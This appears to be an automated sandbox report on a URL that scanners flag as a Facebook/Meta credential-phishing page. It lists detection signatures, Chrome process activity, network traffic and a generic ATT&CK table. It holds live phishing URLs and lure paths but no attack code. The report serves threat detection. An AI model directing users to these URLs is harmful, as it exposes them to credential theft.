Edit tour

Windows Analysis Report
https://leo.xlsir.click/

Overview

General Information

Sample URL:	https://leo.xlsir.click/
Analysis ID:	1448165
Infos:

Detection

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Phishing site detected (based on favicon image match)

Detected non-DNS traffic on DNS port

HTML body contains low number of good links

HTML body contains password input but no form action

HTML title does not match URL

Stores files to the Windows start menu directory

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64

chrome.exe (PID: 5968 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3376 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2292,i,15258614850153021175,15050691775530523032,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 4128 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://leo.xlsir.click/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

String found in binary or memory: <div class="footer"><a href="https://www.facebook.com/legal/terms?paipv=0&eav=AfZ-n0rF_sl3GP74yuYqcJAuMjtNpTHfUcnbG6w6xeh0GTLwLIRte40HvdraKz052z0&_rdr">Terms of Service equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: leo.xlsir.click
Source: global traffic	DNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: static.xx.fbcdn.net
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: 56.126.166.20.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /report/v4?s=jP4Hd2WL5VhQSliYuQcDDcsEQXCJZcU1iXQSbM950zhrETJ%2BJQCtpAf0PJ69mFnue5n6zFpvBUc9Y1jBvckzi9%2BgBxCHweDiqmf1w6jkRviPC%2BN1nTDmMDYeD40vvIqzs1c%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 442Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 22:35:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closex-powered-by: DLEMPCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jP4Hd2WL5VhQSliYuQcDDcsEQXCJZcU1iXQSbM950zhrETJ%2BJQCtpAf0PJ69mFnue5n6zFpvBUc9Y1jBvckzi9%2BgBxCHweDiqmf1w6jkRviPC%2BN1nTDmMDYeD40vvIqzs1c%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88a97a7ba89142b7-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 22:35:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closex-powered-by: DLEMPCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XonXz73k589dOKMyN3lHiKGdMkUOW6ncDahpHXptEyvUbh4kFVSqTEHPy%2Fv%2FvROjx1TTL8Fwfx2E7eJY%2BKExrHrThaq1jGHkAnnM3%2Fwa%2By5G1rwjFdorT1DK51YWDUAJp9M%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88a97a7ee9f742bb-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 22:35:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closex-powered-by: DLEMPCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m8OlEyMGG%2BWUGjgPl%2F7sEInqrkTPkYYEoQlMMGtfnzzafnVPP%2BaZUZgMo%2B0oG5%2B0PJcK6%2B0lLpAFw1FRqFWkYdV%2BEFeeNeNiPj0DlTHnDrMts%2B4dyie%2B2MXnVxMX6AmxjXM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88a97a7eea3a7c7e-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 22:35:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closex-powered-by: DLEMPCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hvaBXLWVPTJsCPlrMIWzj%2FjXHLmmtdgjQgc1BtN1TvOGO4rVuhkMp2SBXncL%2FhnqV0uQRb090ZRw8G3m01%2BKvb1kdr5T%2FhIHIexJexBO5%2FzXYFISS1uDsRcF2rO6PDfNrTs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88a97ac0698b431b-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 22:35:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closex-powered-by: DLEMPCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WZOAJGekKSXVt8VxcIJwJZ7wI7ApqgCnVBG4TNsV7%2F3ZqmZVLIS%2FsZT9TejGL72tcgE6WgUqgICNMTEITta9QAZziTASh3SVfKCZJj6xrvc5Hy1Cq8%2BW8itpeBe93qej7nA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88a97ac88b738cb3-EWRalt-svc: h3=":443"; ma=86400

Source: chromecache_151.2.dr, chromecache_150.2.dr	String found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
Source: chromecache_151.2.dr	String found in binary or memory: https://code.jquery.com/jquery-3.7.1.min.js
Source: chromecache_151.2.dr, chromecache_150.2.dr	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:100
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOkCnqEu92Fr1MmgVxEIzIFKw.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOkCnqEu92Fr1MmgVxFIzIFKw.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOkCnqEu92Fr1MmgVxGIzIFKw.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOkCnqEu92Fr1MmgVxHIzIFKw.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOkCnqEu92Fr1MmgVxIIzI.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOkCnqEu92Fr1MmgVxLIzIFKw.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOkCnqEu92Fr1MmgVxMIzIFKw.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fABc4EsA.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fBBc4.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fBxc4EsA.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fCRc4EsA.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fChc4EsA.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fCxc4EsA.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fABc4EsA.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fBBc4.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fBxc4EsA.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCBc4EsA.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCRc4EsA.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fChc4EsA.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCxc4EsA.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfABc4EsA.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBBc4.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBxc4EsA.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfCBc4EsA.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfCRc4EsA.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfChc4EsA.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfCxc4EsA.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu4WxKOzY.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu4mxK.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu5mxKOzY.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu72xKOzY.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu7GxKOzY.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu7WxKOzY.woff2)
Source: chromecache_147.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu7mxKOzY.woff2)
Source: chromecache_137.2.dr	String found in binary or memory: https://getbootstrap.com/)
Source: chromecache_137.2.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
Source: chromecache_151.2.dr, chromecache_150.2.dr	String found in binary or memory: https://res.cloudinary.com/ductham087/image/upload/v1694658537/mlipp554tgpfzfa4o3zy.jpg
Source: chromecache_151.2.dr, chromecache_150.2.dr	String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 65067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62570
Source: unknown	Network traffic detected: HTTP traffic on port 65064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62569
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 62571 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62569 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62571
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62573
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62570 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65067
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65064
Source: unknown	Network traffic detected: HTTP traffic on port 65066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 62573 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703

Source: unknown	HTTPS traffic detected: 2.19.244.127:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.19.244.127:443 -> 192.168.2.5:49721 version: TLS 1.2

Source: classification engine

Classification label: mal64.phis.win@23/39@19/12

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2292,i,15258614850153021175,15050691775530523032,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://leo.xlsir.click/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2292,i,15258614850153021175,15050691775530523032,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://leo.xlsir.click/	100%	Avira URL Cloud	phishing
https://leo.xlsir.click/	100%	SlashNext	Credential Stealing type: Phishing & Social Engineering

Source	Detection	Scanner	Label
https://cdn.jsdelivr.net/npm/bootstrap	0%	URL Reputation	safe
https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico	0%	URL Reputation	safe
https://getbootstrap.com/)	0%	URL Reputation	safe
https://leo.xlsir.click/images/logo.meta.png	100%	Avira URL Cloud	phishing
https://github.com/twbs/bootstrap/blob/main/LICENSE)	0%	Avira URL Cloud	safe
https://a.nel.cloudflare.com/report/v4?s=WZOAJGekKSXVt8VxcIJwJZ7wI7ApqgCnVBG4TNsV7%2F3ZqmZVLIS%2FsZT9TejGL72tcgE6WgUqgICNMTEITta9QAZziTASh3SVfKCZJj6xrvc5Hy1Cq8%2BW8itpeBe93qej7nA%3D	0%	Avira URL Cloud	safe
https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css	0%	Avira URL Cloud	safe
https://leo.xlsir.click/static/media/background.1f85623d06212e6d3ed4.png	100%	Avira URL Cloud	phishing
https://leo.xlsir.click/static/js/main.a3de5fef.js	100%	Avira URL Cloud	phishing
https://leo.xlsir.click/images/banner1.png	100%	Avira URL Cloud	phishing
https://res.cloudinary.com/ductham087/image/upload/v1694658537/mlipp554tgpfzfa4o3zy.jpg	0%	Avira URL Cloud	safe
https://leo.xlsir.click/css/main.02.css	100%	Avira URL Cloud	phishing
https://leo.xlsir.click/favicon.ico	100%	Avira URL Cloud	phishing
https://leo.xlsir.click/images%20/logo.meta.png	100%	Avira URL Cloud	phishing
https://code.jquery.com/jquery-3.7.1.min.js	0%	Avira URL Cloud	safe
https://a.nel.cloudflare.com/report/v4?s=jP4Hd2WL5VhQSliYuQcDDcsEQXCJZcU1iXQSbM950zhrETJ%2BJQCtpAf0PJ69mFnue5n6zFpvBUc9Y1jBvckzi9%2BgBxCHweDiqmf1w6jkRviPC%2BN1nTDmMDYeD40vvIqzs1c%3D	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
jsdelivr.map.fastly.net	151.101.193.229	true	false	unknown
scontent.xx.fbcdn.net	157.240.252.13	true	false	unknown
a.nel.cloudflare.com	35.190.80.1	true	false	unknown
code.jquery.com	151.101.194.137	true	false	unknown
www.google.com	142.250.184.196	true	false	unknown
leo.xlsir.click	172.67.156.167	true	false	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown
windowsupdatebg.s.llnwi.net	87.248.205.0	true	false	unknown
cdn.jsdelivr.net	unknown	unknown	false	unknown
56.126.166.20.in-addr.arpa	unknown	unknown	false	unknown
static.xx.fbcdn.net	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://a.nel.cloudflare.com/report/v4?s=WZOAJGekKSXVt8VxcIJwJZ7wI7ApqgCnVBG4TNsV7%2F3ZqmZVLIS%2FsZT9TejGL72tcgE6WgUqgICNMTEITta9QAZziTASh3SVfKCZJj6xrvc5Hy1Cq8%2BW8itpeBe93qej7nA%3D	false	Avira URL Cloud: safe	unknown
https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico	false	URL Reputation: safe	unknown
https://leo.xlsir.click/	true		unknown
https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css	false	Avira URL Cloud: safe	unknown
https://leo.xlsir.click/images/logo.meta.png	false	Avira URL Cloud: phishing	unknown
https://leo.xlsir.click/static/media/background.1f85623d06212e6d3ed4.png	false	Avira URL Cloud: phishing	unknown
https://leo.xlsir.click/images/banner1.png	false	Avira URL Cloud: phishing	unknown
https://leo.xlsir.click/static/js/main.a3de5fef.js	false	Avira URL Cloud: phishing	unknown
https://leo.xlsir.click/home.php	true		unknown
https://leo.xlsir.click/meta-community-standard/buiness	false		unknown
https://leo.xlsir.click/css/main.02.css	false	Avira URL Cloud: phishing	unknown
https://leo.xlsir.click/favicon.ico	false	Avira URL Cloud: phishing	unknown
https://leo.xlsir.click/images%20/logo.meta.png	false	Avira URL Cloud: phishing	unknown
https://code.jquery.com/jquery-3.7.1.min.js	false	Avira URL Cloud: safe	unknown
https://a.nel.cloudflare.com/report/v4?s=jP4Hd2WL5VhQSliYuQcDDcsEQXCJZcU1iXQSbM950zhrETJ%2BJQCtpAf0PJ69mFnue5n6zFpvBUc9Y1jBvckzi9%2BgBxCHweDiqmf1w6jkRviPC%2BN1nTDmMDYeD40vvIqzs1c%3D	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://cdn.jsdelivr.net/npm/bootstrap	chromecache_151.2.dr, chromecache_150.2.dr	false	URL Reputation: safe	unknown
https://res.cloudinary.com/ductham087/image/upload/v1694658537/mlipp554tgpfzfa4o3zy.jpg	chromecache_151.2.dr, chromecache_150.2.dr	false	Avira URL Cloud: safe	unknown
https://github.com/twbs/bootstrap/blob/main/LICENSE)	chromecache_137.2.dr	false	Avira URL Cloud: safe	unknown
https://getbootstrap.com/)	chromecache_137.2.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.184.196	www.google.com	United States	15169	GOOGLEUS	false
142.250.185.68	unknown	United States	15169	GOOGLEUS	false
151.101.193.229	jsdelivr.map.fastly.net	United States	54113	FASTLYUS	false
